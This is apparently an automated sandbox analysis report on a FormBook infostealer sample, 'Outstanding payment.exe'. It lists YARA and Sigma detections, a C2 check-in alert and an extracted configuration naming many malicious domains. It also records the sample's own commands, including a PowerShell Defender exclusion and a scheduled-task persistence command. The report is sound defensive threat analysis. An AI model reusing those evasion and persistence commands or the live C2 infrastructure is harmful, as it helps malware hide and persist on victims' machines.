0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x187e9:$sqlite3step: 68 34 1C 7B E1 0x188fc:$sqlite3step: 68 34 1C 7B E1 0x18818:$sqlite3text: 68 38 2A 90 C5 0x1893d:$sqlite3text: 68 38 2A 90 C5 0x1882b:$sqlite3blob: 68 53 D8 7F 8C 0x18953:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6a81:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d3b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb1ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x160d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa138:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa3a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15ed5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x159c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15fd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1614f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xadba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14c3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbab3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c117:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d11a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19039:$sqlite3step: 68 34 1C 7B E1 0x1914c:$sqlite3step: 68 34 1C 7B E1 0x19068:$sqlite3text: 68 38 2A 90 C5 0x1918d:$sqlite3text: 68 38 2A 90 C5 0x1907b:$sqlite3blob: 68 53 D8 7F 8C 0x191a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Outstanding payment.exe PID: 6252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Outstanding payment.exe PID: 6252	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x15028:$a1: 3C 30 50 4F 53 54 74 09 40 0xb828c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: iBSWjb.exe PID: 6648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: iBSWjb.exe PID: 6648	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4610:$a1: 3C 30 50 4F 53 54 74 09 40 0x6d8de:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegSvcs.exe PID: 6564	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa766:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msiexec.exe PID: 3876	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9cc61:$a1: 3C 30 50 4F 53 54 74 09 40 0xe3f4b:$a1: 3C 30 50 4F 53 54 74 09 40 0x11c061:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 4676	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8efd4:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 48 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
15.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
15.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
15.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
15.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
0.2.Outstanding payment.exe.4234148.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Outstanding payment.exe.4234148.2.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Outstanding payment.exe.4234148.2.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa0b11:$a1: 3C 30 50 4F 53 54 74 09 40 0xcdf31:$a1: 3C 30 50 4F 53 54 74 09 40 0xb7440:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe4860:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa527f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd269f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb0167:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xdd587:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Outstanding payment.exe.4234148.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa41c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa4432:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd15e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd1852:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xaff65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xdd385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xafa51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xdce71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb0067:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xdd487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb01df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdd5ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4e4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd226a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xaeccc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xdc0ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5b43:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd2f63:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb61a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe35c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb71aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Outstanding payment.exe.4234148.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb30c9:$sqlite3step: 68 34 1C 7B E1 0xb31dc:$sqlite3step: 68 34 1C 7B E1 0xe04e9:$sqlite3step: 68 34 1C 7B E1 0xe05fc:$sqlite3step: 68 34 1C 7B E1 0xb30f8:$sqlite3text: 68 38 2A 90 C5 0xb321d:$sqlite3text: 68 38 2A 90 C5 0xe0518:$sqlite3text: 68 38 2A 90 C5 0xe063d:$sqlite3text: 68 38 2A 90 C5 0xb310b:$sqlite3blob: 68 53 D8 7F 8C 0xb3233:$sqlite3blob: 68 53 D8 7F 8C 0xe052b:$sqlite3blob: 68 53 D8 7F 8C 0xe0653:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding payment.exe", ParentImage: C:\Users\user\Desktop\Outstanding payment.exe, ParentProcessId: 6252, ParentProcessName: Outstanding payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", ProcessId: 1532, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\iBSWjb.exe, ParentImage: C:\Users\user\AppData\Roaming\iBSWjb.exe, ParentProcessId: 6648, ParentProcessName: iBSWjb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp", ProcessId: 1352, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding payment.exe", ParentImage: C:\Users\user\Desktop\Outstanding payment.exe, ParentProcessId: 6252, ParentProcessName: Outstanding payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", ProcessId: 4796, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding payment.exe", ParentImage: C:\Users\user\Desktop\Outstanding payment.exe, ParentProcessId: 6252, ParentProcessName: Outstanding payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe", ProcessId: 1532, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding payment.exe", ParentImage: C:\Users\user\Desktop\Outstanding payment.exe, ParentProcessId: 6252, ParentProcessName: Outstanding payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp", ProcessId: 4796, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T06:39:42.137978+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49979	121.254.178.252	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Outstanding payment.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.dj1.lat/a03d/	Avira URL Cloud: Label: malware
Source: http://www.istromarmitaria.online/a03d/	Avira URL Cloud: Label: malware
Source: www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.istromarmitaria.online/a03d/www.dj1.lat	Avira URL Cloud: Label: malware
Source: http://www.nfluencer-marketing-13524.bond/a03d/www.atidiri.fun	Avira URL Cloud: Label: malware
Source: http://www.72266.vip/a03d/www.istromarmitaria.online	Avira URL Cloud: Label: malware
Source: http://www.nfluencer-marketing-13524.bond/a03d/	Avira URL Cloud: Label: malware
Source: http://www.duxrib.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.dj1.lat/a03d/j	Avira URL Cloud: Label: malware
Source: http://www.aja168e.live/a03d/www.duxrib.xyz	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.atidiri.fun/a03d/	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/www.aja168e.live	Avira URL Cloud: Label: malware
Source: http://www.oftware-download-92806.bond/a03d/	Avira URL Cloud: Label: malware
Source: http://www.atidiri.fun/a03d/www.otelhafnia.info	Avira URL Cloud: Label: malware
Source: http://www.inggraphic.pro/a03d/	Avira URL Cloud: Label: malware
Source: http://www.behm.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.elnqdjc.shop/a03d/www.8oosnny.xyz	Avira URL Cloud: Label: malware
Source: http://www.72266.vip/a03d/	Avira URL Cloud: Label: malware
Source: http://www.behm.info/a03d/www.enelog.xyz	Avira URL Cloud: Label: malware
Source: http://www.lphatechblog.xyz/a03d/www.oftware-download-92806.bond	Avira URL Cloud: Label: malware
Source: http://www.8oosnny.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.elnqdjc.shop/a03d/	Avira URL Cloud: Label: malware
Source: http://www.lphatechblog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/www.72266.vip	Avira URL Cloud: Label: malware
Source: http://www.inggraphic.pro/a03d/www.elnqdjc.shop	Avira URL Cloud: Label: malware
Source: http://www.aja168e.live/a03d/	Avira URL Cloud: Label: malware
Source: http://www.oftware-download-92806.bond/a03d/www.behm.info	Avira URL Cloud: Label: malware
Source: http://www.duxrib.xyz/a03d/www.lphatechblog.xyz	Avira URL Cloud: Label: malware
Source: http://www.8oosnny.xyz/a03d/www.nfluencer-marketing-13524.bond	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\iBSWjb.exe

Avira: detection malicious, Label: HEUR/AGEN.1310400

Found malware configuration

Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\iBSWjb.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: Outstanding payment.exe	ReversingLabs: Detection: 28%
Source: Outstanding payment.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\iBSWjb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Outstanding payment.exe

Joe Sandbox ML: detected

Source: Outstanding payment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Outstanding payment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: RegSvcs.exe, 0000000F.00000002.2163601401.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2167593167.0000000001950000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4525647281.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2166629916.0000000001520000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2166042893.0000000001038000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169801736.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.2163601401.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2167593167.0000000001950000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4525647281.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: RegSvcs.exe, 00000009.00000002.2166629916.0000000001520000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2166042893.0000000001038000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169801736.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4544436194.000000001108F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526176931.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4527606666.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2164292767.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2162873949.00000000043E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.0000000004740000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2165021648.0000000004596000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2168122863.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.00000000032BE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.0000000003120000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2166132931.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2164292767.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2162873949.00000000043E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.0000000004740000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2165021648.0000000004596000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2168122863.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.00000000032BE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.0000000003120000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2166132931.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4544436194.000000001108F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526176931.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4527606666.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

